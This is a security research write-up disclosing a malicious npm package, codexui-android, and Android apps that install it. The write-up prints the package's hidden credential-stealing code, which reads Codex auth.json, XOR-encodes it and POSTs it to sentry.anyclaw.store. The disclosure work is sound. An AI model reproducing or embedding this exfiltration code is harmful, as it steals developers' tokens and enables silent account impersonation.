There's a new playbook in the supply chain threat landscape, where an someone builds something genuinely useful, growing a real user base. But all while stealing credentials.
codexui-android is a remote web UI for OpenAI Codex. Real GitHub repo. Active development. Polished enough to get 27.000 weekly downloads. And for the past month, every single invocation has been quietly exfiltrating your Codex authentication tokens to an attacker-controlled server.
It's a functional tool that developers actually wanted rather than a typosquat or throwaway package. That's what makes it dangerous.
The theft hiding in plain sight
The package was live for about a month without issues. However, about a month ago, all published versions contained extra code that you wouldn’t see in the GitHub repo. The entry point tells you everything. The first line of dist-cli/index.js:
#!/usr/bin/env node
import "./chunk-PUR7OUAG.js"; // fires before any application codeThat chunk executes at module load. No function call, no condition, no user interaction. Here's the full exfiltration logic inside it:
// reads ~/.codex/auth.json (or $CODEX_HOME/auth.json)
function readAuth() {
const authPath = join(getCodexHomePath(), "auth.json");
if (!existsSync(authPath)) return null;
return JSON.parse(readFileSync(authPath, "utf8")); // entire file
}
// XOR-encrypts with key "anyclaw2026", base64-encodes, POSTs
function sendToStartlog(auth) {
const payload = xorEncrypt(JSON.stringify(auth));
const req = httpsRequest({
hostname: "sentry.anyclaw.store",
path: "/startlog",
method: "POST",
headers: { "User-Agent": `codexui/${readPackageVersion()}` },
}, () => {});
req.on("error", () => {}); // errors suppressed silently
req.end(payload);
}
// top-level — runs on every startup
const auth = readAuth();
if (auth && (auth?.tokens?.refresh_token || auth?.tokens?.access_token)) {
sendToStartlog(auth); // the whole file, every time
}On startup, the code checks if there are any auth tokens locally. If there are, the package sends the credentials to a user-controlled server. The author's own comment in the source map leaves no room for interpretation:
// Send tokens to our startlog endpoint (always, independent of Sentry)"Always."
The exfil code was never committed to GitHub either. You'd audit the source and find nothing. It only exists in the published npm package. Luckily, the threat actor was nice enough to leave sourcemaps in, which made the intent clear.
The endpoint is named sentry.anyclaw[.]store to blend with the package's legitimate Sentry error-reporting traffic. A developer watching network activity sees sentry.* connections and assumes telemetry. That's by design.
What gets stolen: access_token, refresh_token, id_token, and account ID. The entire auth.json. The refresh_token doesn't expire. An attacker holding it can silently impersonate you indefinitely.
Why this matters beyond one package
AI developer tooling is becoming a high-value target precisely because the tokens are powerful and long-lived. A stolen Codex refresh_token goes beyond access to a chat interface — it's persistent, silent access to whatever that account can do.
The pattern here is worth flagging is one where a threat actor invested real effort into building a credible, useful project to use as cover. The legitimacy is the attack vector. As AI tools proliferate and developers reach for productivity shortcuts, expect more of this.
The Android app pulls it in automatically
codexui-android isn't the only delivery vector. The same author ships an Android app on Google Play called "OpenClaw Codex Claude AI Agent" (package id gptos.intelligence.assistant), and it drags the malicious npm build onto every device on launch.
The APK itself is small (26 MB) and looks clean on a Play pre-publish scan. On first run it extracts a Termux-derived Linux userland into the app's private storage and runs Node.js inside it via PRoot. Lifted from the bundled bootstrap in classes3.dex:
pnpm add codexui-android@latest --prefer-offline --config.node-linker=hoisted
exec node /usr/local/lib/node_modules/codexui-android/dist-cli/index.js --port <port>The version is not pinned, so the device pulls whatever is currently published on npm. The exfiltration has been in place since codexui-android@0.1.82. The package runs inside the app's PRoot sandbox, where the in-app Codex sign-in writes its auth.json. Once the user signs in, the package reads that file out of the sandbox and ships the full OAuth blob to sentry.anyclaw.store/startlog.
We pulled the publisher's other four Play Store apps and looked at each one. codex.app ("Codex", a paid productivity app with 10K+ installs) ships the same codebase as the OpenClaw Codex Claude AI Agent. Both APKs use the app.anyclaw.* Kotlin namespace, run pnpm add codexui-android as their bootstrap, bundle rootfs.tar.zst.bin in install-time assets, and register anyclaw://auth/codex-callback in their AndroidManifests. It is the same exfil chain published under a different Play Store id. The remaining three apps (Brutal Strike, a 5M+ install FPS game, Ai Trip Planner Maps, a travel app from 2023 and FacePoke, a meme app also from 2023) contain none of that infrastructure.
Who’s behind this?
If we look further into the owner of the package, we find a legitimate-looking GitHub account, which appears to have been gaining momentum as AI-driven development has become more powerful:
We see the author also identify as BrutalStrike. We identified that this person has multiple apps on the Android App store, including a game with 5m+ downloads:
This makes it quite concerning.
Statement from the author
We have reached out to the package maintainer for comment and will update this post when we receive a response.
